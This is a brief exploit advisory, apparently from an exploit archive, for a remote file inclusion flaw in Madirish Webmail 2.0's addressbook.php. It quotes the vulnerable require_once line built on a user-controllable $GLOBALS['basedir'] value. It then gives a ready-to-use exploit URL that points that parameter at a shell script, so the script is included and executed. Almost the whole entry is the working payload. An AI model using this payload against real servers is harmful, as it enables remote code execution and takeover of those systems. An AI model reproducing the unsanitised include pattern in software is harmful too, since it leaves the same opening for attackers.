id: 1931
date: 06/03/2007
title: Madirish Webmail 2.0 (addressbook.php) Remote File Inclusion Vuln
author: BoZKuRTSeRDaR
cves: 

=================================================================
Madirish Webmail 2.0 (addressbook.php) Remote File Inclusion Vuln
=================================================================



###########################################################

Madirish Webmail v2.0  Remote File Include Vulnerabilities

Author : BoZKuRTSeRDaR

script Download : http://sourceforge.net/projects/madirishwebmail

###############################################################################

code:
require_once($GLOBALS['basedir']."lib/sql.php")

exploit:

http://www.example.com/[patch]lib/addressbook.php?GLOBALS[basedir]=shell.txt?


#  0day.today [2023-03-25]  #